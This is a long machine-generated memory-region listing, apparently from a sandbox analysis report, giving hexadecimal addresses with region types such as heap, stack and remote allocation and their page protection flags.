trusted library allocation
page read and write
1B32D1A4000
trusted library allocation
page read and write
1B32D2DB000
trusted library allocation
page read and write
1E39EE68000
heap
page read and write
28054940000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
2803CC31000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
1C21067E000
heap
page read and write
A05EEFF000
stack
page read and write
B69307B000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
27EC000
heap
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
2803D190000
trusted library allocation
page read and write
1A8F9520000
heap
page execute and read and write
E1C354F000
stack
page read and write
1ABA11B6000
heap
page read and write
15BF6F40000
trusted library allocation
page read and write
1B32D202000
trusted library allocation
page read and write
1AB895F7000
trusted library allocation
page read and write
1B32D38C000
trusted library allocation
page read and write
1B32D079000
trusted library allocation
page read and write
15B80466000
trusted library allocation
page read and write
18ACC3A0000
heap
page read and write
1B32D1E2000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
15B80AD5000
trusted library allocation
page read and write
1C22A750000
heap
page read and write
1E3A0ED1000
trusted library allocation
page read and write
1B32D439000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
635879000
stack
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
3175EFE000
stack
page read and write
234EAE1F000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
234E8DFD000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
15B80BD2000
trusted library allocation
page read and write
1B32D098000
trusted library allocation
page read and write
234E8E40000
heap
page read and write
18ACC0D3000
trusted library allocation
page read and write
CF2000
stack
page read and write
18ACA6B9000
heap
page read and write
15C9A67A000
trusted library allocation
page read and write
1C21063F000
heap
page read and write
2803C0B0000
trusted library allocation
page read and write
1E3A178E000
trusted library allocation
page read and write
1A8808C0000
trusted library allocation
page read and write
18ACC110000
trusted library allocation
page read and write
234EABFC000
heap
page read and write
15B80B2F000
trusted library allocation
page read and write
A70000
heap
page read and write
15C9A3F2000
trusted library allocation
page read and write
1C212630000
heap
page execute and read and write
990000
heap
page read and write
28054B50000
heap
page read and write
15B80B19000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
2804C4D2000
trusted library allocation
page read and write
1B32D149000
trusted library allocation
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
68E614E000
stack
page read and write
211735E0000
heap
page read and write
1C21063D000
heap
page read and write
7FFD9B790000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
7FFD9B816000
trusted library allocation
page read and write
41B000
system
page execute and read and write
1AB870F7000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
15B80C5C000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
234E8CE0000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
2204C172000
trusted library allocation
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
15B8075C000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
7FFD9BB90000
trusted library allocation
page read and write
1A8F7691000
heap
page read and write
1AB89A0E000
trusted library allocation
page read and write
FBC000
stack
page read and write
15C8A18C000
heap
page read and write
1A8F9080000
heap
page read and write
B40000
heap
page read and write
18AE474D000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1A8F9968000
heap
page read and write
1B32D3E6000
trusted library allocation
page read and write
68E553C000
stack
page read and write
15B80001000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
234EAE6F000
heap
page read and write
1B32D170000
trusted library allocation
page read and write
18ACC090000
heap
page readonly
B735BFD000
stack
page read and write
2204C110000
trusted library allocation
page read and write
15BF6F00000
trusted library allocation
page read and write
1C211F90000
heap
page read and write
1120000
heap
page read and write
C3C000
stack
page read and write
1B32D267000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
15BF6D80000
heap
page read and write
DEDE5FF000
stack
page read and write
1C210790000
heap
page read and write
1A8F8FD0000
trusted library allocation
page read and write
1AB870F5000
heap
page read and write
7FFD9B794000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
234EAE6A000
heap
page read and write
1A8F7694000
heap
page read and write
15B80879000
trusted library allocation
page read and write
2F9E000
stack
page read and write
18ACA6CF000
heap
page read and write
1AB88BA0000
heap
page read and write
18AE47DA000
heap
page read and write
234EAA90000
heap
page read and write
34597B000
stack
page read and write
3E00000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
63547F000
stack
page read and write
1B32D26B000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
2804C1E1000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
7FFD9B9D0000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
7FFD9B965000
trusted library allocation
page read and write
2803A7D5000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
1B32D3DF000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
234E8D5F000
heap
page read and write
22054459000
heap
page read and write
1E3A0D00000
trusted library allocation
page read and write
7FFD9BADC000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page execute and read and write
1E39EF5D000
heap
page read and write
15C9A670000
trusted library allocation
page read and write
473000
system
page execute and read and write
2203A508000
heap
page read and write
9D0000
heap
page read and write
B69317E000
stack
page read and write
1B32D28A000
trusted library allocation
page read and write
6358F7000
stack
page read and write
2205446E000
heap
page read and write
2803DB34000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1B32ABB0000
heap
page read and write
7FFD9B836000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
E1C35CF000
stack
page read and write
15CA2827000
heap
page execute and read and write
1410000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
15BF6F20000
trusted library allocation
page read and write
2D4D1830000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
2803A758000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1B32D43D000
trusted library allocation
page read and write
1C22A870000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
7FFD9B960000
trusted library allocation
page execute and read and write
1A880511000
trusted library allocation
page read and write
1A8F9964000
heap
page read and write
2203C4FF000
trusted library allocation
page read and write
2902F3B000
stack
page read and write
15CA26C0000
heap
page read and write
7FFD9BB00000
trusted library allocation
page read and write
2203A4C0000
heap
page read and write
27E0000
heap
page read and write
2803D272000
trusted library allocation
page read and write
53423BE000
stack
page read and write
1ABA1140000
heap
page read and write
A05F1FE000
stack
page read and write
1B32D254000
trusted library allocation
page read and write
1B32D206000
trusted library allocation
page read and write
1B32D37C000
trusted library allocation
page read and write
15BDEBC000
stack
page read and write
2203DB96000
trusted library allocation
page read and write
31763FF000
stack
page read and write
2A919260000
heap
page read and write
234EAAE1000
heap
page read and write
280547C7000
heap
page execute and read and write
18ACC5E3000
trusted library allocation
page read and write
1B32D374000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
15C88562000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
18AE46F8000
heap
page read and write
7FFD9B826000
trusted library allocation
page read and write
15B806CA000
trusted library allocation
page read and write
234EAC8C000
heap
page read and write
1B32D33D000
trusted library allocation
page read and write
17B0000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
15C887A0000
trusted library allocation
page read and write
1B32D180000
trusted library allocation
page read and write
234EAD90000
heap
page read and write
1A8F9992000
heap
page read and write
B736CCE000
stack
page read and write
15B80156000
trusted library allocation
page read and write
B692DFE000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
E1C3BB6000
stack
page read and write
1A8F99AA000
heap
page read and write
15C8B440000
trusted library allocation
page read and write
95C000
stack
page read and write
28054B40000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
1B32D20E000
trusted library allocation
page read and write
1B32D2EB000
trusted library allocation
page read and write
15BF6EE0000
trusted library section
page read and write
7FFD9BA70000
trusted library allocation
page read and write
2203BF20000
heap
page read and write
234E8E20000
heap
page read and write
1B32D188000
trusted library allocation
page read and write
3175BEE000
stack
page read and write
18ADC3C0000
trusted library allocation
page read and write
2203BE40000
heap
page read and write
2203C6BA000
trusted library allocation
page read and write
18ACA870000
heap
page read and write
7FFD9B972000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
2803D20E000
trusted library allocation
page read and write
E1C3F3C000
stack
page read and write
15B80868000
trusted library allocation
page read and write
2203BDD0000
trusted library allocation
page read and write
2D4D3260000
trusted library allocation
page read and write
B73597F000
stack
page read and write
1B32D2E3000
trusted library allocation
page read and write
15C8855E000
heap
page read and write
15CA2930000
heap
page read and write
2204C101000
trusted library allocation
page read and write
1B32D1BB000
trusted library allocation
page read and write
1B32D12E000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1A8F97A7000
heap
page read and write
2803A850000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
2A91926B000
heap
page read and write
1B344D70000
heap
page execute and read and write
7FFD9BAC4000
trusted library allocation
page read and write
2D4D18A0000
heap
page read and write
CD6000
stack
page read and write
1B32D0DB000
trusted library allocation
page read and write
2A919360000
heap
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
1B32D421000
trusted library allocation
page read and write
1B32D1CB000
trusted library allocation
page read and write
15B80153000
trusted library allocation
page read and write
2ED0000
heap
page read and write
1B32CDC0000
trusted library allocation
page read and write
15BF6E80000
heap
page read and write
2804C4D0000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
15B80BED000
trusted library allocation
page read and write
DEDE4FF000
unkown
page read and write
1E3B9100000
heap
page read and write
1AB872D0000
heap
page read and write
1B32D161000
trusted library allocation
page read and write
15C88825000
heap
page read and write
1AB88C70000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
53420FE000
stack
page read and write
1B32D0DF000
trusted library allocation
page read and write
2803D483000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1B32D3BB000
trusted library allocation
page read and write
2203D861000
trusted library allocation
page read and write
1A8F75A0000
heap
page read and write
2D4EB9A7000
heap
page execute and read and write
7FFD9B965000
trusted library allocation
page read and write
2203A546000
heap
page read and write
7DF4C60D0000
trusted library allocation
page execute and read and write
7FFD9B784000
trusted library allocation
page read and write
9CA2DFE000
stack
page read and write
7FFD9B840000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1B32D349000
trusted library allocation
page read and write
D70000
heap
page read and write
B73607B000
stack
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
2803A78A000
heap
page read and write
31760FE000
stack
page read and write
18ACDFEC000
trusted library allocation
page read and write
1B32C4F0000
heap
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
234EAE59000
heap
page read and write
1B32D369000
trusted library allocation
page read and write
3175F79000
stack
page read and write
1B32D184000
trusted library allocation
page read and write
15BF8F4F000
heap
page read and write
2F2E000
stack
page read and write
18ACA6FB000
heap
page read and write
1E3A0D10000
heap
page readonly
E1C3B3E000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
2803A78C000
heap
page read and write
1E3B928C000
heap
page read and write
1E39EF12000
heap
page read and write
7FFD9B932000
trusted library allocation
page read and write
1B32D326000
trusted library allocation
page read and write
15B80150000
trusted library allocation
page read and write
2EEF000
stack
page read and write
2203D835000
trusted library allocation
page read and write
1B32D081000
trusted library allocation
page read and write
3468CE000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
2203D80B000
trusted library allocation
page read and write
15BDD78000
stack
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
7FFD9B826000
trusted library allocation
page read and write
2204C5C2000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
28054A6A000
heap
page read and write
18ACA6B3000
heap
page read and write
15B80CB4000
trusted library allocation
page read and write
9CA287F000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
2B6C000
stack
page read and write
3456FF000
stack
page read and write
9CA398E000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1B32D31A000
trusted library allocation
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
1B32D1CF000
trusted library allocation
page read and write
9CA2BF9000
stack
page read and write
A20000
heap
page read and write
15F0000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
9CA2E7E000
stack
page read and write
28054A7C000
heap
page read and write
1B32D394000
trusted library allocation
page read and write
3176076000
stack
page read and write
21173340000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1C210619000
heap
page read and write
1A88007C000
trusted library allocation
page read and write
2803D1E3000
trusted library allocation
page read and write
2203C738000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
EA8000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
B6931FE000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
234EAB0E000
heap
page read and write
2803A870000
heap
page read and write
234EABFC000
heap
page read and write
1B32D221000
trusted library allocation
page read and write
1A89007E000
trusted library allocation
page read and write
CEF000
stack
page read and write
7DF41A220000
trusted library allocation
page execute and read and write
15B80C9F000
trusted library allocation
page read and write
1C21067A000
heap
page read and write
2203C4FD000
trusted library allocation
page read and write
15B80C77000
trusted library allocation
page read and write
B692D7E000
stack
page read and write
2203BD90000
trusted library allocation
page read and write
113A000
heap
page read and write
15B80CCE000
trusted library allocation
page read and write
2203C180000
trusted library allocation
page read and write
1B32D27A000
trusted library allocation
page read and write
15B80BFC000
trusted library allocation
page read and write
1B32D0CB000
trusted library allocation
page read and write
2203A4CA000
heap
page read and write
1A8F9870000
heap
page read and write
234E8F85000
heap
page read and write
15BF6FC0000
heap
page read and write
1C21061F000
heap
page read and write
2203DBEC000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
15C8B4A3000
trusted library allocation
page read and write
1B32D132000
trusted library allocation
page read and write
2803C1D0000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1ABA11B4000
heap
page read and write
234EAA91000
heap
page read and write
7FFD9B9BB000
trusted library allocation
page read and write
15BDCFE000
stack
page read and write
38AE000
stack
page read and write
1E3A1606000
trusted library allocation
page read and write
15BF8D23000
trusted library allocation
page read and write
18ACC42B000
trusted library allocation
page read and write
1B32D0EF000
trusted library allocation
page read and write
234EAE7C000
heap
page read and write
2803C130000
heap
page execute and read and write
15C9A381000
trusted library allocation
page read and write
7FFD9B902000
trusted library allocation
page read and write
2680000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
15C8B627000
trusted library allocation
page read and write
E1C38FD000
stack
page read and write
234E8DFD000
heap
page read and write
234EAB9D000
heap
page read and write
1B32D3CF000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
2203BDF0000
heap
page execute and read and write
1E3A0DE0000
heap
page execute and read and write
15BDBFB000
stack
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
3175FFE000
stack
page read and write
18AE4D00000
heap
page read and write
15B80159000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
1B32D094000
trusted library allocation
page read and write
1C212D76000
trusted library allocation
page read and write
A05EBFE000
stack
page read and write
F83000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
1C210750000
heap
page read and write
B735CF6000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
280546F2000
heap
page read and write
317637F000
stack
page read and write
E1C3C3E000
stack
page read and write
7FFD9BA6C000
trusted library allocation
page read and write
386E000
stack
page read and write
1AB87150000
heap
page read and write
1B32CD6E000
trusted library allocation
page read and write
1B32C8B0000
heap
page readonly
18ACC020000
heap
page read and write
113A000
stack
page read and write
1B32D2FF000
trusted library allocation
page read and write
F76000
heap
page read and write
2203DD82000
trusted library allocation
page read and write
A1E000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
B7358FE000
unkown
page read and write
280546AE000
heap
page read and write
7FFD9B8B0000
trusted library allocation
page execute and read and write
1B32D10E000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
1C2125B6000
heap
page execute and read and write
1AB8961E000
trusted library allocation
page read and write
1B32CB51000
trusted library allocation
page read and write
1A880496000
trusted library allocation
page read and write
1010000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
234EAA92000
heap
page read and write
7FFD9B774000
trusted library allocation
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
2D4D1C45000
heap
page read and write
2803D3F0000
trusted library allocation
page read and write
149E000
stack
page read and write
1B32D145000
trusted library allocation
page read and write
1B32D102000
trusted library allocation
page read and write
1B32D0E3000
trusted library allocation
page read and write
18ACC0D0000
trusted library allocation
page read and write
534207E000
stack
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
18ACA684000
heap
page read and write
7FFD9B902000
trusted library allocation
page read and write
1B32D1BF000
trusted library allocation
page read and write
345672000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1B32D2BC000
trusted library allocation
page read and write
15C8AF69000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
280546F7000
heap
page read and write
15B80B63000
trusted library allocation
page read and write
220544C9000
heap
page read and write
1B32D402000
trusted library allocation
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
7FFD9B9A0000
trusted library allocation
page read and write
1B32D22D000
trusted library allocation
page read and write
AD0000
heap
page read and write
1A88052C000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
28054210000
trusted library allocation
page read and write
234EAE76000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
1AB89C68000
trusted library allocation
page read and write
15BF8E91000
heap
page read and write
15B80BE9000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
3A1E000
stack
page read and write
22054540000
heap
page read and write
1B33CB41000
trusted library allocation
page read and write
1A89027F000
trusted library allocation
page read and write
1E3A1379000
trusted library allocation
page read and write
1A8804B5000
trusted library allocation
page read and write
2203A522000
heap
page read and write
7FFD9B952000
trusted library allocation
page read and write
E1C387E000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1A8F7653000
heap
page read and write
280547C0000
heap
page execute and read and write
7FFD9B810000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
18ACA630000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
E1C3CBC000
stack
page read and write
15B80C6C000
trusted library allocation
page read and write
18ACDC4B000
trusted library allocation
page read and write
2203D87D000
trusted library allocation
page read and write
1E3A13F2000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
7FFD9B990000
trusted library allocation
page read and write
15B80CD8000
trusted library allocation
page read and write
234EAB91000
heap
page read and write
15B8088C000
trusted library allocation
page read and write
A80000
heap
page read and write
15B8076C000
trusted library allocation
page read and write
234EAE34000
heap
page read and write
2D4EBCA0000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
1B33CBBD000
trusted library allocation
page read and write
234EAC87000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
2203A4A5000
heap
page read and write
1B32D32A000
trusted library allocation
page read and write
1E3B0EE1000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1E3A15E5000
trusted library allocation
page read and write
9E0000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
3000000
heap
page read and write
1B32D2AC000
trusted library allocation
page read and write
234EAE21000
heap
page read and write
234E8D6E000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9B954000
trusted library allocation
page read and write
18AE49B0000
heap
page read and write
7FFD9BB63000
trusted library allocation
page read and write
10001000
direct allocation
page execute and read and write
1A8F76BF000
heap
page read and write
1B32D1D7000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
15C8A3FE000
trusted library allocation
page read and write
1AB89141000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
234E8F80000
heap
page read and write
1C212AF5000
trusted library allocation
page read and write
2D4D191A000
heap
page read and write
2203DE24000
trusted library allocation
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
18AE46F0000
heap
page read and write
6354FF000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1C22A7C4000
heap
page read and write
2D4D192C000
heap
page read and write
E90000
heap
page read and write
635979000
stack
page read and write
345DBE000
stack
page read and write
2D4E351C000
trusted library allocation
page read and write
1AB87111000
heap
page read and write
18ACC3B1000
trusted library allocation
page read and write
2203C6B6000
trusted library allocation
page read and write
15B80C32000
trusted library allocation
page read and write
7FFD9B911000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
7FFD9B846000
trusted library allocation
page execute and read and write
1C22A7D6000
heap
page read and write
1E3A1385000
trusted library allocation
page read and write
1E39F050000
heap
page read and write
15B80C09000
trusted library allocation
page read and write
1B32D0B4000
trusted library allocation
page read and write
28054868000
heap
page read and write
15C8ADD1000
trusted library allocation
page read and write
1C22AA1F000
heap
page read and write
15B80C34000
trusted library allocation
page read and write
15B8013F000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
15CA2793000
heap
page read and write
1B32D2CC000
trusted library allocation
page read and write
1B32D3C7000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
B692EF8000
stack
page read and write
2203BDF6000
heap
page execute and read and write
7FFD9BB9C000
trusted library allocation
page read and write
1C212653000
trusted library allocation
page read and write
2803DA73000
trusted library allocation
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
1A880013000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
15BF8F00000
heap
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
7FFD9B9F0000
trusted library allocation
page read and write
234EAE60000
heap
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
15BF8EA0000
heap
page read and write
1A880011000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
15C8B3B1000
trusted library allocation
page read and write
15C8A000000
trusted library allocation
page read and write
1A88051C000
trusted library allocation
page read and write
5341BCE000
stack
page read and write
7FFD9B830000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1B32D215000
trusted library allocation
page read and write
1B32D259000
trusted library allocation
page read and write
F10000
heap
page read and write
1B32D1A7000
trusted library allocation
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
1AB87190000
heap
page read and write
68E507E000
stack
page read and write
15C887D0000
heap
page readonly
1B32D3BF000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
1A8804A7000
trusted library allocation
page read and write
EFC000
stack
page read and write
2203C101000
trusted library allocation
page read and write
15BEBCD000
stack
page read and write
2D4D34C0000
heap
page execute and read and write
68E55BE000
stack
page read and write
15CA2A66000
heap
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
1AB895D2000
trusted library allocation
page read and write
15C88700000
heap
page read and write
F90000
heap
page read and write
2203D88A000
trusted library allocation
page read and write
5341B43000
stack
page read and write
1AB870D5000
heap
page read and write
68E517E000
stack
page read and write
15BEB4E000
stack
page read and write
5341E7E000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
345CBD000
stack
page read and write
18AE48D0000
heap
page read and write
15C8A170000
heap
page read and write
A05EDFF000
stack
page read and write
21173420000
heap
page read and write
1A8F94C6000
heap
page execute and read and write
1B32D3EA000
trusted library allocation
page read and write
1A8F94C0000
heap
page execute and read and write
30C0000
heap
page read and write
15C8C1A8000
trusted library allocation
page read and write
1B32D08D000
trusted library allocation
page read and write
1B32D1FE000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
2803C6AD000
trusted library allocation
page read and write
2203DBE8000
trusted library allocation
page read and write
85C000
stack
page read and write
1A8F99D9000
heap
page read and write
9CA2AFE000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1AB891BB000
trusted library allocation
page read and write
B735D7A000
stack
page read and write
1C212B8C000
trusted library allocation
page read and write
1B32D1B7000
trusted library allocation
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
9CA25BF000
stack
page read and write
18ACA677000
heap
page read and write
1C2226DF000
trusted library allocation
page read and write
1B32D0D7000
trusted library allocation
page read and write
7FFD9B978000
trusted library allocation
page read and write
1A8F8FF0000
heap
page readonly
2803C25D000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
2D4D4102000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
7FFD9B780000
trusted library allocation
page read and write
1B33CB51000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
7FFD9B7AB000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
1B32A970000
heap
page read and write
D8D000
stack
page read and write
1B32D1EA000
trusted library allocation
page read and write
1AB872DE000
heap
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
2203C694000
trusted library allocation
page read and write
B735A79000
stack
page read and write
7FFD9BA90000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1B32C545000
heap
page read and write
7FFD9B921000
trusted library allocation
page read and write
1C212EFE000
trusted library allocation
page read and write
2203C0C0000
trusted library section
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1AB993C0000
trusted library allocation
page read and write
1B32D1AF000
trusted library allocation
page read and write
18ACA840000
heap
page read and write
28054860000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page execute and read and write
234EAE44000
heap
page read and write
1B32D2C8000
trusted library allocation
page read and write
1B32D0D3000
trusted library allocation
page read and write
15BF6E20000
heap
page read and write
1C212B62000
trusted library allocation
page read and write
362E000
stack
page read and write
1C2105D1000
heap
page read and write
220544EE000
heap
page read and write
2203A54B000
heap
page read and write
234EAAC0000
heap
page read and write
15BDAFE000
stack
page read and write
1B32D089000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
1E39EE40000
heap
page read and write
9CA2B7D000
stack
page read and write
15B80B71000
trusted library allocation
page read and write
1AB8981E000
trusted library allocation
page read and write
1C212D92000
trusted library allocation
page read and write
1B32D1C3000
trusted library allocation
page read and write
1A8F75C0000
heap
page read and write
7FFD9B790000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
1AB872D5000
heap
page read and write
7FFD9B962000
trusted library allocation
page read and write
7FFD9B921000
trusted library allocation
page read and write
B693CCE000
stack
page read and write
1B32D01E000
trusted library allocation
page read and write
1B32C9E0000
heap
page read and write
7FFD9B91A000
trusted library allocation
page read and write
1E39EEF9000
heap
page read and write
9CA2EFF000
stack
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1B33CBB1000
trusted library allocation
page read and write
22054450000
heap
page read and write
22054640000
heap
page read and write
1B32D31E000
trusted library allocation
page read and write
1B344DA0000
heap
page read and write
2D4D3290000
heap
page readonly
1C22AA43000
heap
page read and write
317704C000
stack
page read and write
15BE0BE000
stack
page read and write
15BD7CF000
stack
page read and write
345AFA000
stack
page read and write
1B32D235000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9BAC9000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
15B80CC9000
trusted library allocation
page read and write
2203C729000
trusted library allocation
page read and write
1B32AB11000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
2D4D1958000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
15C9A7E4000
trusted library allocation
page read and write
68E54BC000
stack
page read and write
1B32D359000
trusted library allocation
page read and write
2803C090000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
1320000
heap
page read and write
28054949000
heap
page read and write
1B32D229000
trusted library allocation
page read and write
234EAC86000
heap
page read and write
1ABA1212000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
1A8F8FA0000
trusted library allocation
page read and write
E1C3D3E000
stack
page read and write
1C212AE9000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1B32D303000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
1B32D263000
trusted library allocation
page read and write
54700FD000
stack
page read and write
1C211F40000
heap
page read and write
1B32D378000
trusted library allocation
page read and write
534233C000
stack
page read and write
234E8DEB000
heap
page read and write
15B80B2B000
trusted library allocation
page read and write
1A880001000
trusted library allocation
page read and write
1C22A9F6000
heap
page read and write
68E537A000
stack
page read and write
1C210609000
heap
page read and write
1B32D0A8000
trusted library allocation
page read and write
15B800CC000
trusted library allocation
page read and write
234EABFC000
heap
page read and write
B735FFE000
stack
page read and write
990000
heap
page read and write
15CA2A7C000
heap
page read and write
234EAE2E000
heap
page read and write
B735AFE000
stack
page read and write
1B32D212000
trusted library allocation
page read and write
1B32D122000
trusted library allocation
page read and write
1B32D1F6000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
345C38000
stack
page read and write
234EAF60000
heap
page read and write
15B80580000
trusted library allocation
page read and write
